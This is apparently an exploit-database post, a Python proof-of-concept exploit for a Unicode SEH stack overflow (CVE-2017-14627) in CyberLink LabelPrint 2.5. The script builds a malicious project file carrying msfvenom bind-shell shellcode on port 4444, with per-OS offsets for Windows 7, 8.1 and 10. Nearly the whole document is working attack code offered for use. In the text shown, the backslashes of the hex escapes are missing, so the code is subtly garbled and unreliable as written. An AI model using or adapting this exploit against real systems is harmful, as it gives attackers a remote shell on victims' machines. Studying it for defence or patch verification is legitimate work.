CyberLink LabelPrint Buffer Overflow
Posted on 26 September 2017
#!/usr/bin/python # Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow # Date: September 23, 2017 # Exploit Author: f3ci # Vendor Homepage: https://www.cyberlink.com/ # Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe # Version: 2.5 # Tested on: Windows 7x86, Windows8.1x64, Windows 10 # CVE : CVE-2017-14627 # # Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops. # this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation. def exp(): header = ("x3cx50x52x4fx4ax45x43x54x20x76x65x72x73x69x6fx6e" "x3dx22x31x2ex30x2ex30x30x22x3ex0ax09x3cx49x4ex46" "x4fx52x4dx41x54x49x4fx4ex20x74x69x74x6cx65x3dx22" "x22x20x61x75x74x68x6fx72x3dx22x22x20x64x61x74x65" "x3dx22x37x2fx32x34x2fx32x30x31x37x22x20x53x79x73" "x74x65x6dx54x69x6dx65x3dx22x32x34x2fx30x37x2fx32" "x30x31x37x22x3e") filename2 = "labelprint_poc_universal.lpp" f = open(filename2,'w') junk = "A" * 790 nseh = "x61x42" seh = "x2cx44" nop = "x42" #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python buf = "" buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ" buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk" buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7" buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9" buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M" buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD" buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB" buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj" buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP" buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW" buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM" buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F" buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv" buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA" #preparing address for decoding ven = nop #nop/inc edx ven += "x54" #push esp ven += nop #nop/inc edx ven += "x58" #pop eax ven += nop #nop/inc edx ven += "x05x1Bx01" #add eax 01001B00 universal ven += nop #nop/inc edx ven += "x2dx01x01" #sub eax 01001000 ven += nop #nop/inc edx ven += "x50" #push eax ven += nop #nop/inc edx ven += "x5c" #pop esp #we need to encode the RET address, since C3 is bad char. #preparing ret opcode ven += nop #nop/inc edx ven += "x25x7ex7e" #and eax,7e007e00 ven += nop #nop/inc edx ven += "x25x01x01" #and eax,01000100 ven += nop #nop/inc edx ven += "x35x7fx7f" #xor eax,7f007f00 ven += nop #nop/inc edx ven += "x05x44x44" #add eax,44004400 ven += nop #nop/inc edx ven += "x57" #push edi ven += nop #nop/inc edx ven += "x50" #push eax ven += junk2 #depending OS #custom venetian ven += "x58" #pop eax ven += nop #nop/inc edx ven += "x58" #pop eax ven += nop #nop/inc edx ven += align #depending OS ven += nop #nop/inc edx ven += "x2dx01x01" #add eax, 01000100 #align eax to our buffer ven += nop #nop/inc edx ven += "x50" #push eax ven += nop #nop/inc edx #call esp 0x7c32537b MFC71U.dll ven += "x5C" #pop esp ven += nop #nop/inc edx ven += "x58" #pop eax ven += nop #nop/inc edx ven += "x05x53x7c" #add eax 7c005300 part of call esp ven += nop #nop/inc edx ven += "x50" #push eax ven += junk1 #depending OS ven += "x7bx32" #part of call esp #preparing for shellcode ven += nop * 114 #junk ven += "x57" #push edi ven += nop #nop/inc edx ven += "x58" #pop eax ven += nop #nop/inc edx ven += align2 #depending OS ven += nop #nop/inc edx ven += "x2dx01x01" #sub eax,01000100 ven += nop #nop/inc edx ven += buf #shellcode sisa = nop * (15000-len(junk+nseh+seh+ven)) payload = junk+nseh+seh+ven+sisa bug="x09x09x3cx54x52x41x43x4bx20x6ex61x6dx65x3d"+'"'+payload+'"'+"/> " bug+=("x09x3cx2fx49x4ex46x4fx52x4dx41x54x49x4fx4ex3ex0a" "x3cx2fx50x52x4fx4ax45x43x54x3e") f.write(header+ " " + bug) print "[+] File", filename2, "successfully created!" print "[*] Now open project file", filename2, "with CyberLink LabelPrint." print "[*] Good luck ;)" f.close() print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->" print "[*] by f3ci & modpr0be <research[at]spentera.id>" print "[*] <-------------------------------------------------> " print " 1.Windows 7 x86 bindshell on port 4444" print " 2.Windows 8.1 x64 bindshell on port 4444" print " 3.Windows 10 x64 bindshell on port 4444 " input = input("Choose Target OS : ") try: if input == 1: align = "x05x09x01" #add eax,01000400 align2 = "x05x0Ax01" #add eax, 01000900 junk1 = 'x42' * 68 #junk for win7x86 junk2 = 'x42' * 893 #junk for win7x86 exp() elif input == 2: align = "x05x09x01" #add eax,01000400 align2 = "x05x0Ax01" #add eax, 01000900 junk1 = 'x42' * 116 #junk for win8.1x64 junk2 = 'x42' * 845 #junk for win8.1x64 exp() elif input == 3: align = "x05x05x01" #add eax,01000400 align2 = "x05x06x01" #add eax, 01000900 junk1 = 'x42' * 136 #junk for win10x64 junk2 = 'x42' * 313 #junk for win10x64 exp() else: print "Choose the right one :)" except: print ""
